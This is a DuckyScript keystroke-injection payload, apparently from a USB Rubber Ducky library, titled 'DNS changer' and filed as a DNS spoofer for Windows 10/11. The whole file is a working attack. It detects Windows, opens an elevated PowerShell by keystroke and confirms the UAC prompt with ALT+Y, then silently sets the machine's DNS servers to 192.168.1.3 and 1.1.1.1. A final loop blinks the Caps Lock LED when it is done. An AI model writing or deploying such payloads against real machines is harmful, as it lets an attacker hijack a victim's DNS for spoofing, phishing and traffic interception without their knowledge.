Path: blob/master/payloads/library/execution/DNS_spoofer/payload.txt
3018 views
REM Title: DNS changer1REM Author: luu1762REM Description: Changes DNS address of windows machine in powershell3REM Target: Windows 10/1145REM wifi interface should be named: Wi-Fi6DEFINE #interface Ethernet7DEFINE #primaryDNS 192.168.1.38DEFINE #secondaryDNS 1.1.1.1910EXTENSION PASSIVE_WINDOWS_DETECT11REM VERSION 1.112REM AUTHOR: Korben1314REM_BLOCK DOCUMENTATION15Windows fully passive OS Detection and passive Detect Ready16Includes its own passive detect ready.17Does not require additional extensions.1819USAGE:20Extension runs inline (here)21Place at beginning of payload (besides ATTACKMODE) to act as dynamic22boot delay23$_OS will be set to WINDOWS or NOT_WINDOWS24See end of payload for usage within payload25END_REM2627REM CONFIGURATION:28DEFINE #MAX_WAIT 15029DEFINE #CHECK_INTERVAL 2030DEFINE #WINDOWS_HOST_REQUEST_COUNT 231DEFINE #NOT_WINDOWS 73233$_OS = #NOT_WINDOWS3435VAR $MAX_TRIES = #MAX_WAIT36WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))37DELAY #CHECK_INTERVAL38$MAX_TRIES = ($MAX_TRIES - 1)39END_WHILE40IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN41$_OS = WINDOWS42END_IF4344REM_BLOCK EXAMPLE USAGE AFTER EXTENSION45IF ($_OS == WINDOWS) THEN46STRING HELLO WINDOWS!47ELSE48STRING HELLO WORLD!49END_IF50END_REM51END_EXTENSION5253SAVE_HOST_KEYBOARD_LOCK_STATE54GUI r55DELAY 15056STRINGLN powershell Start-Process powershell -Verb runAs57DELAY 80058ALT y59DELAY 50060STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit61REM below is to blink the LED when payload done62VAR $i = 063WHILE ( $i < 9 )64DELAY 15065CAPSLOCK66$i = ( $i + 1 )67END_WHILE68RESTORE_HOST_KEYBOARD_LOCK_STATE697071